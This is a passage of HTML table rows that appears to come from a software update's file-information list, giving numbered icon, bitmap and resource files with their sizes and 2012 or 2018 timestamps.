applicable</td><td>154</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12106</td><td>Not applicable</td><td>268</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12107</td><td>Not applicable</td><td>160</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12109</td><td>Not applicable</td><td>196</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12110</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12111</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12112</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12113</td><td>Not applicable</td><td>278</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12114</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12115</td><td>Not applicable</td><td>20</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12116</td><td>Not applicable</td><td>298</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12117</td><td>Not applicable</td><td>188</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12118</td><td>Not applicable</td><td>72</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12119</td><td>Not applicable</td><td>218</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12120</td><td>Not applicable</td><td>416</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12121</td><td>Not applicable</td><td>468</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12122</td><td>Not applicable</td><td>704</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12124</td><td>Not applicable</td><td>382</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12125</td><td>Not applicable</td><td>524</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12126</td><td>Not applicable</td><td>564</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12127</td><td>Not applicable</td><td>376</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12128</td><td>Not applicable</td><td>440</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12130</td><td>Not applicable</td><td>148</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12131</td><td>Not applicable</td><td>204</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12132</td><td>Not applicable</td><td>168</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12133</td><td>Not applicable</td><td>108</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12134</td><td>Not applicable</td><td>208</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12135</td><td>Not applicable</td><td>108</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12140</td><td>Not applicable</td><td>18</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12141</td><td>Not applicable</td><td>70</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12142</td><td>Not applicable</td><td>264</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12143</td><td>Not applicable</td><td>16</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12144</td><td>Not applicable</td><td>2</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12150</td><td>Not applicable</td><td>306</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12151</td><td>Not applicable</td><td>606</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12152</td><td>Not applicable</td><td>326</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12153</td><td>Not applicable</td><td>332</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12154</td><td>Not applicable</td><td>84</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12157</td><td>Not applicable</td><td>312</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12158</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12159</td><td>Not applicable</td><td>292</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12170</td><td>Not applicable</td><td>294</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12172</td><td>Not applicable</td><td>320</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12173</td><td>Not applicable</td><td>320</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12177</td><td>Not applicable</td><td>300</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12178</td><td>Not applicable</td><td>754</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12179</td><td>Not applicable</td><td>278</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12180</td><td>Not applicable</td><td>28</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12181</td><td>Not applicable</td><td>112</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12189</td><td>Not applicable</td><td>106</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12190</td><td>Not applicable</td><td>172</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12191</td><td>Not applicable</td><td>158</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>122</td><td>Not applicable</td><td>10,240</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>122.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1221</td><td>Not applicable</td><td>1,336</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1222</td><td>Not applicable</td><td>26</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12220</td><td>Not applicable</td><td>374</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12221</td><td>Not applicable</td><td>354</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12222</td><td>Not applicable</td><td>280</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12223</td><td>Not applicable</td><td>234</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12224</td><td>Not applicable</td><td>354</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12225</td><td>Not applicable</td><td>198</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12226</td><td>Not applicable</td><td>274</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12227</td><td>Not applicable</td><td>228</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12228</td><td>Not applicable</td><td>224</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12229</td><td>Not applicable</td><td>300</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1223</td><td>Not applicable</td><td>1,424</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12230</td><td>Not applicable</td><td>138</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1227</td><td>Not applicable</td><td>1,436</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1229</td><td>Not applicable</td><td>956</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>123</td><td>Not applicable</td><td>7,168</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>123.ico</td><td>Not applicable</td><td>3,774</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12300</td><td>Not applicable</td><td>316</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12301</td><td>Not applicable</td><td>548</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12302</td><td>Not applicable</td><td>182</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12303</td><td>Not applicable</td><td>82</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1231</td><td>Not applicable</td><td>2,352</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1239</td><td>Not applicable</td><td>1,700</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>124</td><td>Not applicable</td><td>5,632</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>124.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1240</td><td>Not applicable</td><td>1,136</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1243</td><td>Not applicable</td><td>1,568</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1245</td><td>Not applicable</td><td>1,528</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1246</td><td>Not applicable</td><td>2,392</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1247</td><td>Not applicable</td><td>1,904</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>125</td><td>Not applicable</td><td>17,408</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>125.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1250</td><td>Not applicable</td><td>348</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12500</td><td>Not applicable</td><td>52</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12501</td><td>Not applicable</td><td>64</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12502</td><td>Not applicable</td><td>52</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12503</td><td>Not applicable</td><td>28</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12504</td><td>Not applicable</td><td>28</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12505</td><td>Not applicable</td><td>40</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12506</td><td>Not applicable</td><td>16</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12508</td><td>Not applicable</td><td>28</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1251</td><td>Not applicable</td><td>170</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12512</td><td>Not applicable</td><td>52</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12513</td><td>Not applicable</td><td>52</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12516</td><td>Not applicable</td><td>52</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1253</td><td>Not applicable</td><td>266</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12530</td><td>Not applicable</td><td>148</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12531</td><td>Not applicable</td><td>154</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1254</td><td>Not applicable</td><td>774</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12540</td><td>Not applicable</td><td>228</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12541</td><td>Not applicable</td><td>342</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12542</td><td>Not applicable</td><td>234</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12550</td><td>Not applicable</td><td>228</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12551</td><td>Not applicable</td><td>228</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1256</td><td>Not applicable</td><td>1,836</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>12560</td><td>Not applicable</td><td>234</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1257</td><td>Not applicable</td><td>618</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1258</td><td>Not applicable</td><td>76</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>126</td><td>Not applicable</td><td>5,632</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>126.ico</td><td>Not applicable</td><td>9,662</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1260</td><td>Not applicable</td><td>2,144</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1261</td><td>Not applicable</td><td>1,340</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1262</td><td>Not applicable</td><td>1,044</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1263</td><td>Not applicable</td><td>1,912</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1264</td><td>Not applicable</td><td>1,208</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1265</td><td>Not applicable</td><td>956</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1267</td><td>Not applicable</td><td>1,668</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1268</td><td>Not applicable</td><td>1,032</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>127</td><td>Not applicable</td><td>180</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>127.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1270</td><td>Not applicable</td><td>756</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1271</td><td>Not applicable</td><td>124</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>128</td><td>Not applicable</td><td>34</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>128.bmp</td><td>Not applicable</td><td>9,578</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>128.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1280</td><td>Not applicable</td><td>4,316</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1283</td><td>Not applicable</td><td>740</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1285</td><td>Not applicable</td><td>1,780</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1286</td><td>Not applicable</td><td>1,036</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1287</td><td>Not applicable</td><td>824</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1288</td><td>Not applicable</td><td>1,580</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1289</td><td>Not applicable</td><td>672</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>129</td><td>Not applicable</td><td>62</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>129.ico</td><td>Not applicable</td><td>894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1290</td><td>Not applicable</td><td>344</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1291</td><td>Not applicable</td><td>108</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1293</td><td>Not applicable</td><td>1,408</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1294</td><td>Not applicable</td><td>268</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1295</td><td>Not applicable</td><td>100</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1296</td><td>Not applicable</td><td>62</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1297</td><td>Not applicable</td><td>692</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1298</td><td>Not applicable</td><td>1,096</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>13</td><td>Not applicable</td><td>638</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>13.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>130</td><td>Not applicable</td><td>308</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>130.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1300</td><td>Not applicable</td><td>708</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>13000</td><td>Not applicable</td><td>196</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>13001</td><td>Not applicable</td><td>392</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>13003</td><td>Not applicable</td><td>470</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>13005</td><td>Not applicable</td><td>334</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>13007</td><td>Not applicable</td><td>320</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>13008</td><td>Not applicable</td><td>464</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1302</td><td>Not applicable</td><td>480</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1304</td><td>Not applicable</td><td>588</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1305</td><td>Not applicable</td><td>360</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1306</td><td>Not applicable</td><td>876</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>131</td><td>Not applicable</td><td>180</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>131.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>13100</td><td>Not applicable</td><td>600</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>13100.bmp</td><td>Not applicable</td><td>34,476</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>13101.bmp</td><td>Not applicable</td><td>17,324</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>13102.bmp</td><td>Not applicable</td><td>3,626</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>13103.bmp</td><td>Not applicable</td><td>225,390</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>132.ico</td><td>Not applicable</td><td>3,774</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1320</td><td>Not applicable</td><td>352</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>13200</td><td>Not applicable</td><td>288</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>1321</td><td>Not applicable</td><td>1,364</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1323</td><td>Not applicable</td><td>1,064</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>133.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1330</td><td>Not applicable</td><td>1,068</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>13300</td><td>Not applicable</td><td>368</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>1331</td><td>Not applicable</td><td>1,588</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1332</td><td>Not applicable</td><td>1,564</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1333</td><td>Not applicable</td><td>648</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1335</td><td>Not applicable</td><td>1,024</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1336</td><td>Not applicable</td><td>1,414</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1337</td><td>Not applicable</td><td>1,736</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1338</td><td>Not applicable</td><td>1,860</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>134.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>135</td><td>Not applicable</td><td>501</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>135.ico</td><td>Not applicable</td><td>9,662</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1351</td><td>Not applicable</td><td>1,256</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1352</td><td>Not applicable</td><td>424</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1355</td><td>Not applicable</td><td>240</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1356</td><td>Not applicable</td><td>1,100</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1358</td><td>Not applicable</td><td>468</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1359</td><td>Not applicable</td><td>424</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>136.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1360</td><td>Not applicable</td><td>558</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1365</td><td>Not applicable</td><td>892</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1366</td><td>Not applicable</td><td>548</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1367</td><td>Not applicable</td><td>760</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1368</td><td>Not applicable</td><td>560</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1369</td><td>Not applicable</td><td>568</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>137.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1370</td><td>Not applicable</td><td>1,276</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>138.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1381</td><td>Not applicable</td><td>244</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1382</td><td>Not applicable</td><td>220</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1386</td><td>Not applicable</td><td>1,808</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>139</td><td>Not applicable</td><td>364</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>139.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1390</td><td>Not applicable</td><td>172</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1392</td><td>Not applicable</td><td>536</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>14</td><td>Not applicable</td><td>1,540</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>14.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>140.bmp</td><td>Not applicable</td><td>382</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>140.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>14000</td><td>Not applicable</td><td>24</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>14001</td><td>Not applicable</td><td>32</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>14002</td><td>Not applicable</td><td>42</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>141.bmp</td><td>Not applicable</td><td>382</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>141.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1412</td><td>Not applicable</td><td>420</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1414</td><td>Not applicable</td><td>1,224</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1415</td><td>Not applicable</td><td>1,196</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1416</td><td>Not applicable</td><td>304</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1417</td><td>Not applicable</td><td>924</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1418</td><td>Not applicable</td><td>578</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1419</td><td>Not applicable</td><td>324</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>142.bmp</td><td>Not applicable</td><td>382</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>142.ico</td><td>Not applicable</td><td>3,774</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1420</td><td>Not applicable</td><td>604</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1422</td><td>Not applicable</td><td>680</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1423</td><td>Not applicable</td><td>644</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>143.bmp</td><td>Not applicable</td><td>382</td><td>08-Aug-2012</td><td>05:04</td><td>Not applicable</td></tr><tr><td>143.ico</td><td>Not applicable</td><td>2,238</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>144.bmp</td><td>Not applicable</td><td>1,302</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>144.ico</td><td>Not applicable</td><td>1,406</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>145.bmp</td><td>Not applicable</td><td>114</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>145.ico</td><td>Not applicable</td><td>9,662</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>146.bmp</td><td>Not applicable</td><td>114</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>146.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>147.ico</td><td>Not applicable</td><td>1,150</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>148.ico</td><td>Not applicable</td><td>4,286</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>149.ico</td><td>Not applicable</td><td>766</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>15</td><td>Not applicable</td><td>4,228</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>15.ico</td><td>Not applicable</td><td>894</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>150.ico</td><td>Not applicable</td><td>318</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>1500</td><td>Not applicable</td><td>948</td><td>18-Jan-2018</td><td>06:15</td><td>Not applicable</td></tr><tr><td>15000</td><td>Not 